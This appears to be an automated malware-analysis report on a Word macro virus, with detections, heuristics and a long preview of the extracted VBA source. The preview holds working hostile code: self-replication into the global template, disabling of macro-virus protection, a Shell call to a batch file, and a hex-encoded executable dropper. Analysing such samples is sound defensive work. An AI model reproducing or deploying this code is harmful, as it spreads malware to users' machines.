MALICIOUS
316
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close functions, which are indicative of malicious intent. The critical heuristic firing for Shell() calls in VBA, combined with ClamAV detections (Win.Trojan.Pivis-2 and Doc.Trojan.VMPCK1-5), strongly suggests a downloader or dropper functionality. The VBA script attempts to export a component as 'Fax.txt', likely to facilitate the execution of a second-stage payload.
Heuristics 7
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell ("c:\startv.bat"), vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 106925 bytes |
SHA-256: 904dfd142ad33d5ee3f476e900ce8b8b403fe2f9fd54b2df62ee871ac79c8cac |
|||
|
Detection
ClamAV:
Doc.Trojan.VMPCK1-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Umang_Fa"
Public AD As Object, NT As Object
Sub AutoOpen()
On Error GoTo hapus
Dim NT As Object
Dockenor
Create_Loader
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "Umang_Fa" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "Umang_Fa" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = True Then GoTo Label_Exit
If ActivInstall = True And NormInstall = False Then Set Doc = ActiveDocument
If ActivInstall = False And NormInstall = True Then Set Doc = NormalTemplate
Pad = Options.DefaultFilePath(wdDocumentsPath)
ModuleLength = Doc.VBProject.VBComponents("Umang_Fa").CodeModule.CountOfLines
NT.Save
Doc.VBProject.VBComponents("Umang_Fa").Export Pad + ("\Fax.txt")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
Umang_Fa
Label_Exit:
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
'CommandBars("Format").Controls("Style...").Delete
If NormInstall = True Then Call Create_Loader
Application.ScreenUpdating = True
Application.DisplayAlerts = wdAlertsAll
Application.EnableCancelKey = wdCancelInterrupt
hapus:
Dockenor
End Sub
Sub Create_Loader()
On Error Resume Next
Options.DefaultFilePath(wdStartupPath) = "C:\Windows"
Options.DefaultFilePath(wdTempFilePath) = "C:\Windows\inf"
Pad1 = Options.DefaultFilePath(wdStartupPath)
MyFile = Dir(Pad1 + "\Fax.dot")
If MyFile = "" Then
Set aDoc = NormalTemplate.OpenAsDocument
With aDoc
.SaveAs FileName:=Pad1 + "\Fax.dot"
.Close SaveChanges:=wdDoNotSaveChanges
End With
End If
End Sub
Sub Umang_Fa()
On Error Resume Next
'Dockenor
Norkedoc
'Call sim
Call Create_Loader
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If Month(Now()) = 1 And Day(Now()) = 9 Then Call ultah
If Month(Now()) = 11 And Day(Now()) = 16 Then Call ultah
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Phurbaranji ....... Bandarlampung"
.Title = "Word Macro Virus.... it just fun"
.Subject = "Dedicate for My Lv Umang_Fa Triwidhiyanti"
.Comments = "Virus ini tidak berbahaya anda jangan coba-coba merubah atau menggunakan Tools|Macro Ntar tau akibatnya"
.Execute
End With
bodo:
End Sub
Sub FileSave()
On Error Resume Next
Norkedoc
'Dockenor
ActiveDocument.Save
Umang_Fa
End Sub
Sub FileClose()
On Error Resume Next
Norkedoc
'Dockenor
If ActiveDocument.Saved = False Then ActiveDocument.Save
Umang_Fa
ActiveDocument.Close
End Sub
Sub FileSaveAs()
On Error Resume Next
Norkedoc
'Dockenor
Umang_Fa
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileExit()
On Error Resume Next
Norkedoc
'Dockenor
Umang_Fa
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Norkedoc
'Dockenor
Umang_Fa
End Sub
Sub AutoExec()
On Error GoTo hapus
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Call zap("c:\windows\zap.bat")
Call sim
Umang_Fa
WBF
AddIns.Unload False
WBF
hapus:
Dockenor
End Sub
Sub AutoClose()
On Error Resume Next
Norkedoc
'Dockenor
Umang_Fa
End Sub
Sub ToolsMacro()
On Error Resume Next
Umang_Fa
If System.OperatingSystem = "Windows" Then Call p5687("C:\start.scr")
If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
Call pesen
End Sub
Sub FileTemplates()
On Error Resume Next
Umang_Fa
If System.OperatingSystem = "Windows" Then Call p5687("C:\start.scr")
If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
Call pesen
End Sub
Sub ViewVBCode()
On Error Resume Next
Umang_Fa
If System.OperatingSystem = "Windows" Then Call p5687("C:\start.scr")
If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
Call pesen
End Sub
Sub p5687(strFile As String)
On Error Resume Next
Dim hFile As Long
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "N start.com"
Print #hFile, "E 0100 4D 5A 36 01 01 00 00 00 04 00 00 00 FF FF 00 00"
Print #hFile, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #hFile, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00"
Print #hFile, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #hFile, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 72 65 71 75 69"
Print #hFile, "E 0160 72 65 73 20 4D 69 63 72 6F 73 6F 66 74 20 57 69"
Print #hFile, "E 0170 6E 64 6F 77 73 2E 0D 0A 24 00 00 00 00 00 00 00"
Print #hFile, "E 0180 4E 45 05 3C 9F 00 0F 00 00 00 00 00 02 03 02 00"
Print #hFile, "E 0190 00 04 00 14 1A 00 01 00 00 00 02 00 02 00 02 00"
Print #hFile, "E 01A0 3D 00 40 00 50 00 85 00 8E 00 92 00 2E 01 00 00"
Print #hFile, "E 01B0 02 00 04 00 00 00 02 08 18 00 0C 01 00 00 0A 03"
Print #hFile, "E 01C0 1A 00 39 0C 50 1D 39 0C F6 00 94 02 51 0C 94 02"
Print #hFile, "E 01D0 04 00 0E 80 01 00 00 00 00 00 24 01 02 00 30 1C"
Print #hFile, "E 01E0 2C 00 00 00 00 00 03 80 01 00 00 00 00 00 26 01"
Print #hFile, "E 01F0 2F 00 30 1C 01 80 00 00 00 00 00 00 08 41 4C 4F"
Print #hFile, "E 0200 41 50 49 43 4F 05 41 4C 4F 41 50 00 00 00 01 00"
Print #hFile, "E 0210 08 00 00 06 4B 45 52 4E 45 4C 04 55 53 45 52 02"
Print #hFile, "E 0220 FF 01 CD 3F 01 16 0A 01 CD 3F 01 18 0B 00 15 41"
Print #hFile, "E 0230 20 6D 69 6E 69 6D 75 6D 20 41 70 70 6C 69 63 61"
Print #hFile, "E 0240 74 69 6F 6E 00 00 09 45 58 43 49 54 50 52 4F 43"
Print #hFile, "E 0250 02 00 15 4F 56 45 52 4C 41 50 50 45 44 57 49 4E"
Print #hFile, "E 0260 44 4F 57 50 52 4F 43 31 01 00 00 00 00 00 00 00"
Print #hFile, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02B0 FF FF B0 FF 50 9A DD 01 3C 0B 33 ED 55 9A FF FF"
Print #hFile, "E 02C0 00 00 0B C0 74 EC 8C 06 46 00 81 C1 00 01 72 E2"
Print #hFile, "E 02D0 89 0E 10 00 89 36 12 00 89 3E 14 00 89 1E 16 00"
Print #hFile, "E 02E0 8C 06 18 00 89 16 1A 00 9A FF FF 00 00 86 C4 A3"
Print #hFile, "E 02F0 48 00 B4 30 2E F7 06 10 00 01 00 74 07 9A FF FF"
Print #hFile, "E 0300 00 00 EB 02 CD 21 A3 4C 00 86 C4 A3 4A 00 2E F7"
Print #hFile, "E 0310 06 10 00 01 00 75 05 B0 00 A2 4F 00 33 C0 50 9A"
Print #hFile, "E 0320 FF FF 00 00 FF 36 14 00 9A FF FF 00 00 0B C0 74"
Print #hFile, "E 0330 81 9A F0 00 18 00 9A D4 02 94 00 9A 56 04 99 00"
Print #hFile, "E 0340 E8 43 07 FF 36 84 00 FF 36 82 00 FF 36 80 00 9A"
Print #hFile, "E 0350 C4 00 9E 00 83 C4 06 50 9A CF 01 B2 00 B8 15 00"
Print #hFile, "E 0360 E9 28 04 00 8C D8 90 45 55 8B EC 1E 8E D8 FF 36"
Print #hFile, "E 0370 14 00 FF 36 12 00 FF 36 18 00 FF 36 16 00 FF 36"
Print #hFile, "E 0380 1A 00 9A F0 08 BB 00 83 ED 02 8B E5 1F 5D 4D CB"
Print #hFile, "E 0390 8C D8 90 45 55 8B EC 1E 8E D8 B8 00 35 2E F7 06"
Print #hFile, "E 03A0 10 00 01 00 74 07 9A 5E 00 00 00 EB 02 CD 21 89"
Print #hFile, "E 03B0 1E 32 00 8C 06 34 00 0E 1F B8 00 25 BA E6 04 2E"
Print #hFile, "E 03C0 F7 06 10 00 01 00 74 07 9A 07 01 00 00 EB 02 CD"
Print #hFile, "E 03D0 21 16 1F 8B 0E 1E 01 E3 29 8E 06 46 00 26 8B 36"
Print #hFile, "E 03E0 2C 00 A1 20 01 8B 16 22 01 33 DB FF 1E 1C 01 73"
Print #hFile, "E 03F0 03 E9 7A 01 A1 24 01 8B 16 26 01 BB 03 00 FF 1E"
Print #hFile, "E 0400 1C 01 8E 06 46 00 26 8B 0E 2C 00 E3 3E 8E C1 33"
Print #hFile, "E 0410 FF 26 80 3D 00 74 34 B9 0D 00 BE 24 00 F3 A6 74"
Print #hFile, "E 0420 0B B9 FF 7F 33 C0 F2 AE 75 21 EB E5 06 1E 07 1F"
Print #hFile, "E 0430 8B F7 BF 58 00 B1 04 AC 2C 41 72 0D D2 E0 92 AC"
Print #hFile, "E 0440 2C 41 72 05 0A C2 AA EB EE 16 1F BE 28 01 BF 28"
Print #hFile, "E 0450 01 E8 E2 00 BE 28 01 BF 28 01 E8 D9 00 BE 28 01"
Print #hFile, "E 0460 BF 28 01 E8 D0 00 83 ED 02 8B E5 1F 5D 4D CB 8C"
Print #hFile, "E 0470 D8 90 45 55 8B EC 1E 8E D8 33 C9 EB 2F 8C D8 90"
Print #hFile, "E 0480 45 55 8B EC 1E 8E D8 B9 01 00 EB 20 8C D8 90 45"
Print #hFile, "E 0490 55 8B EC 1E 8E D8 56 57 B9 00 01 EB 0F 8C D8 90"
Print #hFile, "E 04A0 45 55 8B EC 1E 8E D8 56 57 B9 01 01 88 2E 8D 00"
Print #hFile, "E 04B0 51 0A C9 75 1C BE 8A 02 BF 8A 02 E8 78 00 BE 28"
Print #hFile, "E 04C0 01 BF 28 01 E8 6F 00 8B 76 06 56 E8 B8 05 83 C4"
Print #hFile, "E 04D0 02 BE 28 01 BF 28 01 E8 5C 00 BE 28 01 BF 28 01"
Print #hFile, "E 04E0 E8 53 00 E8 27 00 58 0A E4 75 17 8B 46 06 B4 4C"
Print #hFile, "E 04F0 2E F7 06 10 00 01 00 74 07 9A 29 01 00 00 EB 02"
Print #hFile, "E 0500 CD 21 5F 5E 83 ED 02 8B E5 1F 5D 4D CB 8B 0E 1E"
Print #hFile, "E 0510 01 E3 07 BB 02 00 FF 1E 1C 01 1E C5 16 32 00 B8"
Print #hFile, "E 0520 00 25 2E F7 06 10 00 01 00 74 07 9A 5A 02 00 00"
Print #hFile, "E 0530 EB 02 CD 21 1F C3 3B F7 73 0E 83 EF 04 8B 05 0B"
Print #hFile, "E 0540 45 02 74 F2 FF 1D EB EE C3 00 8C D8 90 45 55 8B"
Print #hFile, "E 0550 EC 1E 8E D8 B8 FC 00 50 0E E8 A9 02 B8 FF 00 50"
Print #hFile, "E 0560 0E E8 A1 02 83 ED 02 8B E5 1F 5D 4D CB 00 B8 02"
Print #hFile, "E 0570 00 E9 17 02 8F 06 92 00 8F 06 94 00 B8 04 01 B9"
Print #hFile, "E 0580 08 00 E8 BD 02 89 16 88 00 A3 86 00 52 50 FF 36"
Print #hFile, "E 0590 14 00 52 50 B8 04 01 50 9A FF FF 00 00 5B 07 03"
Print #hFile, "E 05A0 D8 26 C6 07 00 BA 01 00 BF 01 00 BE 81 00 8E 1E"
Print #hFile, "E 05B0 46 00 AC 3C 20 74 FB 3C 09 74 F7 3C 0D 74 6F 0A"
Print #hFile, "E 05C0 C0 74 6B 47 4E AC 3C 20 74 E8 3C 09 74 E4 3C 0D"
Print #hFile, "E 05D0 74 5C 0A C0 74 58 3C 22 74 24 3C 5C 74 03 42 EB"
Print #hFile, "E 05E0 E4 33 C9 41 AC 3C 5C 74 FA 3C 22 74 04 03 D1 EB"
Print #hFile, "E 05F0 D3 8B C1 D1 E9 13 D1 A8 01 75 CA EB 01 4E AC 3C"
Print #hFile, "E 0600 0D 74 2B 0A C0 74 27 3C 22 74 BA 3C 5C 74 03 42"
Print #hFile, "E 0610 EB EC 33 C9 41 AC 3C 5C 74 FA 3C 22 74 04 03 D1"
Print #hFile, "E 0620 EB DB 8B C1 D1 E9 13 D1 A8 01 75 D2 EB 97 16 1F"
Print #hFile, "E 0630 89 3E 80 00 03 D7 47 D1 E7 03 D7 42 80 E2 FE 2B"
Print #hFile, "E 0640 E2 8B C4 A3 82 00 8B D8 03 FB 16 07 C5 36 86 00"
Print #hFile, "E 0650 36 89 37 43 43 36 8E 1E 46 00 BE 81 00 EB 03 33"
Print #hFile, "E 0660 C0 AA AC 3C 20 74 FB 3C 09 74 F7 3C 0D 74 7C 0A"
Print #hFile, "E 0670 C0 74 78 36 89 3F 43 43 4E AC 3C 20 74 E1 3C 09"
Print #hFile, "E 0680 74 DD 3C 0D 74 62 0A C0 74 5E 3C 22 74 27 3C 5C"
Print #hFile, "E 0690 74 03 AA EB E4 33 C9 41 AC 3C 5C 74 FA 3C 22 74"
Print #hFile, "E 06A0 06 B0 5C F3 AA EB D1 B0 5C D1 E9 F3 AA 73 06 B0"
Print #hFile, "E 06B0 22 AA EB C5 4E AC 3C 0D 74 2E 0A C0 74 2A 3C 22"
Print #hFile, "E 06C0 74 B7 3C 5C 74 03 AA EB EC 33 C9 41 AC 3C 5C 74"
Print #hFile, "E 06D0 FA 3C 22 74 06 B0 5C F3 AA EB D9 B0 5C D1 E9 F3"
Print #hFile, "E 06E0 AA 73 96 B0 22 AA EB CD 33 C0 AA 16 1F C7 07 00"
Print #hFile, "E 06F0 00 FF 2E 92 00 00 8C D8 90 45 55 8B EC 1E 8E D8"
Print #hFile, "E 0700 1E 9A FF FF 00 00 0B C0 74 03 BA 00 00 8B DA 8E"
Print #hFile, "E 0710 C2 33 C0 33 F6 33 FF B9 FF FF 0B DB 74 0E 26 80"
Print #hFile, "E 0720 3E 00 00 00 74 06 F2 AE 46 AE 75 FA 8B C7 40 24"
Print #hFile, "E 0730 FE 46 8B FE D1 E6 B9 09 00 E8 06 01 50 8B C6 E8"
Print #hFile, "E 0740 00 01 A3 84 00 06 1E 07 1F 8B CF 8B D8 33 F6 5F"
Print #hFile, "E 0750 49 E3 26 8B 04 36 3B 06 24 00 75 10 51 56 57 BF"
Print #hFile, "E 0760 24 00 B9 06 00 F3 A7 5F 5E 59 74 05 26 89 3F 43"
Print #hFile, "E 0770 43 AC AA 0A C0 75 FA E2 DA 26 89 0F 1F 83 ED 02"
Print #hFile, "E 0780 8B E5 1F 5D 4D CB 16 1F B8 03 00 50 50 0E E8 B9"
Print #hFile, "E 0790 FD 0E E8 70 00 0E E8 35 00 33 DB 0B C0 74 1D 8B"
Print #hFile, "E 07A0 F8 B8 09 00 80 3D 4D 75 03 B8 0F 00 03 F8 57 1E"
Print #hFile, "E 07B0 07 B0 0D B9 22 00 F2 AE 88 5D FF 58 53 1E 50 9A"
Print #hFile, "E 07C0 FF FF 00 00 B8 FF 00 50 9A FF FF 00 00 00 8C D8"
Print #hFile, "E 07D0 90 45 55 8B EC 1E 8E D8 56 57 1E 07 8B 56 06 BE"
Print #hFile, "E 07E0 30 01 AD 3B C2 74 10 40 96 74 0C 97 33 C0 B9 FF"
Print #hFile, "E 07F0 FF F2 AE 8B F7 EB EB 96 5F 5E 83 ED 02 8B E5 1F"
Print #hFile, "E 0800 5D 4D CA 02 00 8C D8 90 45 55 8B EC 1E 8E D8 57"
Print #hFile, "E 0810 83 3E 9C 00 00 74 1F FF 76 06 0E E8 B0 FF 0B C0"
Print #hFile, "E 0820 74 14 92 8B FA 33 C0 B9 FF FF F2 AE F7 D1 49 8B"
Print #hFile, "E 0830 1E 52 00 E8 55 02 5F 83 ED 02 8B E5 1F 5D 4D CA"
Print #hFile, "E 0840 02 00 55 8B EC 53 06 51 B9 00 10 87 0E 96 00 51"
Print #hFile, "E 0850 50 9A F2 07 E5 00 5B 8F 06 96 00 59 8C DA 0B C0"
Print #hFile, "E 0860 74 04 07 5B EB 05 8B C1 E9 20 FF 8B E5 5D C3 00"
Print #hFile, "E 0870 51 57 F6 47 02 01 74 63 E8 E7 00 8B FE 8B 04 A8"
Print #hFile, "E 0880 01 74 03 2B C8 49 41 41 8B 77 04 0B F6 74 4C 03"
Print #hFile, "E 0890 CE 73 09 33 C0 BA F0 FF E3 30 EB 3F 16 07 26 A1"
Print #hFile, "E 08A0 96 00 3D 00 10 74 16 BA 00 80 3B D0 72 06 D1 EA"
Print #hFile, "E 08B0 75 F8 EB 22 83 FA 08 72 1D D1 E2 8B C2 48 8B D0"
Print #hFile, "E 08C0 03 C1 73 02 33 C0 F7 D2 23 C2 52 E8 2E 00 5A 73"
Print #hFile, "E 08D0 0D 83 FA F0 74 05 B8 10 00 EB E2 F9 EB 1B 8B D0"
Print #hFile, "E 08E0 2B 57 04 89 47 04 89 7F 0A 8B 77 0C 4A 89 14 42"
Print #hFile, "E 08F0 03 F2 C7 04 FE FF 89 77 0C 5F 59 C3 8B D0 F6 47"
Print #hFile, "E 0900 02 04 74 02 EB 51 52 51 53 8B 77 06 2E 8B 1E 10"
Print #hFile, "E 0910 00 33 C9 0B D2 75 07 F7 C3 10 00 75 40 41 B8 02"
Print #hFile, "E 0920 00 F7 C3 01 00 75 03 B8 20 00 56 51 52 50 9A FF"
Print #hFile, "E 0930 FF 00 00 0B C0 74 26 3B C6 75 1C 56 9A FF FF 00"
Print #hFile, "E 0940 00 0B D0 74 12 5B 59 5A 8B C2 F6 47 02 04 74 04"
Print #hFile, "E 0950 4A 89 57 FE F8 EB 0A B8 12 00 E9 2E FE 5B 59 5A"
Print #hFile, "E 0960 F9 C3 57 8B 77 0A 3B 77 0C 75 03 8B 77 08 AD 83"
Print #hFile, "E 0970 F8 FE 74 08 8B FE 24 FE 03 F0 EB F2 4F 4F 8B F7"
Print #hFile, "E 0980 5F C3 45 55 8B EC 1E 8B 46 06 A3 98 00 C7 06 9A"
Print #hFile, "E 0990 00 00 00 8D 66 FE 1F 5D 4D CB 45 55 8B EC 1E B8"
Print #hFile, "E 09A0 FD 43 BA 03 00 52 50 FF 36 9A 00 FF 36 98 00 9A"
Print #hFile, "E 09B0 2E 07 B4 05 05 C3 9E 83 D2 26 A3 98 00 89 16 9A"
Print #hFile, "E 09C0 00 8B C2 80 E4 7F 8D 66 FE 1F 5D 4D CB 90 55 8B"
Print #hFile, "E 09D0 EC 8B 46 08 8B 4E 0C 0B C8 8B 4E 0A 75 09 8B 46"
Print #hFile, "E 09E0 06 F7 E1 5D CA 08 00 53 F7 E1 8B D8 8B 46 06 F7"
Print #hFile, "E 09F0 66 0C 03 D8 8B 46 06 F7 E1 03 D3 5B 5D CA 08 00"
Print #hFile, "E 0A00 55 8B EC 33 C0 8B 4E 0E E3 79 1E 57 56 C5 76 06"
Print #hFile, "E 0A10 C4 7E 0A 8B C1 48 8B D7 F7 D2 2B C2 1B DB 23 C3"
Print #hFile, "E 0A20 03 C2 8B D6 F7 D2 2B C2 1B DB 23 C3 03 C2 40 91"
Print #hFile, "E 0A30 2B C1 92 AC 26 8A 25 3A E0 75 1F 47 E2 F5 92 91"
Print #hFile, "E 0A40 E3 3E 0B F6 75 07 8C D8 05 FF FF 8E D8 0B FF 75"
Print #hFile, "E 0A50 C2 8C C0 05 A9 07 8E C0 EB B9 2C 41 3C 1A 1A DB"
Print #hFile, "E 0A60 80 E3 20 02 C3 04 41 80 EC 41 80 FC 1A 1A DB 80"
Print #hFile, "E 0A70 E3 20 02 E3 80 C4 41 3A C4 74 C0 1B C0 83 D8 FF"
Print #hFile, "E 0A80 5E 5F 1F 5D CB 00 55 8B EC 5D C3 B8 14 00 E9 FA"
Print #hFile, "E 0A90 FC 00 45 55 8B EC 1E 83 EC 02 83 7E 06 00 75 05"
Print #hFile, "E 0AA0 C7 46 06 01 00 B8 FF FF 50 9A 9F 08 00 00 B8 20"
Print #hFile, "E 0AB0 00 50 FF 76 06 9A FF FF 00 00 89 46 FC B8 FF FF"
Print #hFile, "E 0AC0 50 9A C7 08 00 00 83 7E FC 00 75 17 A1 A0 00 0B"
Print #hFile, "E 0AD0 06 9E 00 74 0E FF 76 06 FF 1E 9E 00 83 C4 02 0B"
Print #hFile, "E 0AE0 C0 75 C2 8B 46 FC 8D 66 FE 1F 5D 4D CB 90 45 55"
Print #hFile, "E 0AF0 8B EC 1E 83 7E 06 00 74 08 FF 76 06 9A FF FF 00"
Print #hFile, "E 0B00 00 8D 66 FE 1F 5D 4D CB 45 55 8B EC 1E 83 EC 04"
Print #hFile, "E 0B10 83 7E 06 00 75 0E FF 76 08 9A F2 07 90 08 83 C4"
Print #hFile, "E 0B20 02 EB 4B 90 83 7E 08 00 75 10 FF 76 06 9A 4E 08"
Print #hFile, "E 0B30 12 07 83 C4 02 33 C0 EB 35 90 B8 FF FF 50 9A FF"
Print #hFile, "E 0B40 FF 00 00 FF 76 06 83 7E 08 00 74 06 8B 46 08 EB"
Print #hFile, "E 0B50 04 90 B8 01 00 50 B8 62 00 50 9A FF FF 00 00 89"
Print #hFile, "E 0B60 46 FC B8 FF FF 50 9A FF FF 00 00 8B 46 FC 8D 66"
Print #hFile, "E 0B70 FE 1F 5D 4D CB 90 45 55 8B EC 1E FF 76 06 9A FF"
Print #hFile, "E 0B80 FF 00 00 8D 66 FE 1F 5D 4D CB 00 00 00 00 00 00"
Print #hFile, "E 0B90 C8 02 00 00 56 83 7E 0C 00 74 19 9A FF FF 00 00"
Print #hFile, "E 0BA0 50 1E 68 A8 00 1E 68 A2 00 6A 10 9A FF FF 00 00"
Print #hFile, "E 0BB0 33 C0 EB 30 8B 76 FE FF 76 06 FF 76 0A FF 76 08"
Print #hFile, "E 0BC0 FF 76 0C FF 76 0E 9A 4A 09 38 09 83 C4 0A 0B C0"
Print #hFile, "E 0BD0 74 10 FF 76 0E 9A E4 09 40 09 5B 8B F0 9A 14 0A"
Print #hFile, "E 0BE0 FF FF 8B C6 5E C9 CA 0A 00 00 C8 1A 00 00 56 8B"
Print #hFile, "E 0BF0 76 06 83 7E 08 00 75 4F C7 46 E6 00 00 C7 46 E8"
Print #hFile, "E 0C00 16 0A C7 46 EA 29 09 33 C0 89 46 EC 89 46 EE 89"
Print #hFile, "E 0C10 76 F0 56 1E 68 C2 00 9A FF FF 00 00 89 46 F2 C7"
Print #hFile, "E 0C20 46 F4 00 00 C7 46 F6 02 00 2B C0 89 46 FA 89 46"
Print #hFile, "E 0C30 F8 C7 46 FC CC 00 8C 5E FE 8D 46 E6 16 50 9A FF"
Print #hFile, "E 0C40 FF 00 00 0B C0 74 39 1E 68 CC 00 1E 68 DA 00 68"
Print #hFile, "E 0C50 08 20 6A 00 68 00 80 68 00 80 68 00 80 68 00 80"
Print #hFile, "E 0C60 6A 00 6A 00 56 6A 00 6A 00 9A FF FF 00 00 A3 92"
Print #hFile, "E 0C70 02 89 36 90 02 50 6A 07 9A FF FF 00 00 A1 92 02"
Print #hFile, "E 0C80 5E C9 CB 00 C8 12 00 00 EB 14 8D 46 EE 16 50 9A"
Print #hFile, "E 0C90 FF FF 00 00 8D 46 EE 16 50 9A FF FF 00 00 8D 46"
Print #hFile, "E 0CA0 EE 16 50 6A 00 6A 00 6A 00 9A FF FF 00 00 0B C0"
Print #hFile, "E 0CB0 75 D8 C9 CB CB 00 C8 14 00 00 57 56 8B 46 0C 48"
Print #hFile, "E 0CC0 74 2D 48 75 03 E9 AC 00 2D 11 00 75 03 E9 DE 00"
Print #hFile, "E 0CD0 2D 00 01 75 03 E9 BD 00 FF 76 0E FF 76 0C FF 76"
Print #hFile, "E 0CE0 0A FF 76 08 FF 76 06 9A FF FF 00 00 E9 C2 00 8B"
Print #hFile, "E 0CF0 76 0E 6A 00 9A 5F 0A 00 00 A3 7A 02 6A 01 9A FF"
Print #hFile, "E 0D00 FF 00 00 A3 7C 02 56 68 4C 04 1E 68 A2 00 1E 68"
Print #hFile, "E 0D10 E8 00 6A 1E 9A FF FF 00 00 8B F8 50 6A 00 6A 00"
Print #hFile, "E 0D20 9A FF FF 00 00 57 1E 68 EE 00 8D 46 EC 16 50 9A"
Print #hFile, "E 0D30 FF FF 00 00 83 C4 0A 1E 68 A2 00 1E 68 E8 00 8D"
Print #hFile, "E 0D40 46 EC 16 50 9A B6 0A 00 00 1E 68 A2 00 1E 68 0A"
Print #hFile, "E 0D50 01 1E 68 F2 00 9A FF FF 00 00 68 65 09 68 18 0B"
Print #hFile, "E 0D60 FF 36 90 02 9A FF FF 00 00 A3 7E 02 89 16 80 02"
Print #hFile, "E 0D70 56 E9 67 FF FF 36 80 02 FF 36 7E 02 9A FF FF 00"
Print #hFile, "E 0D80 00 FF 76 0E 68 4C 04 9A FF FF 00 00 6A 00 9A FF"
Print #hFile, "E 0D90 FF 00 00 EB 19 8B 46 0A 2D 4C 04 75 11 FF 36 80"
Print #hFile, "E 0DA0 02 FF 36 7E 02 6A 00 6A 00 9A FF FF 00 00 33 C0"
Print #hFile, "E 0DB0 99 5E 5F C9 CA 0A 00 00 C8 26 00 00 57 56 8B 76"
Print #hFile, "E 0DC0 0A 56 8D 46 DA 16 50 6A 13 9A FF FF 00 00 6A 06"
Print #hFile, "E 0DD0 1E 68 12 01 8D 46 DA 16 50 9A 60 07 A8 0B 83 C4"
Print #hFile, "E 0DE0 0A 0B C0 74 1E 56 9A FF FF 00 00 0B C0 75 14 56"
Print #hFile, "E 0DF0 9A FF FF 00 00 0B C0 74 0A 56 9A FF FF 00 00 0B"
Print #hFile, "E 0E00 C0 75 03 E9 CA 00 56 8D 46 EE 16 50 9A FF FF 00"
Print #hFile, "E 0E10 00 8B 46 F2 8B 7E EE 2B C7 89 46 FC 8B 46 F0 89"
Print #hFile, "E 0E20 46 FE 2B 46 F4 F7 D8 89 46 FA 0B FF 7F 07 C7 46"
Print #hFile, "E 0E30 F6 01 00 EB 29 8B 46 FC 03 C7 3B 06 7A 02 7C 05"
Print #hFile, "E 0E40 B8 FF FF EB 16 9A FA 06 DF 0B 2D FF 3F 0B C0 7E"
Print #hFile, "E 0E50 05 B8 01 00 EB 02 33 C0 03 C0 48 89 46 F6 83 7E"
Print #hFile, "E 0E60 FE 00 7F 07 C7 46 F8 01 00 EB 2A 8B 46 FA 03 46"
Print #hFile, "E 0E70 FE 3B 06 7C 02 7C 05 B8 FF FF EB 16 9A FA 06 F8"
Print #hFile, "E 0E80 0B 2D FF 3F 0B C0 7E 05 B8 01 00 EB 02 33 C0 03"
Print #hFile, "E 0E90 C0 48 89 46 F8 9A FA 06 0F 0C 8B C8 81 C1 E8 03"
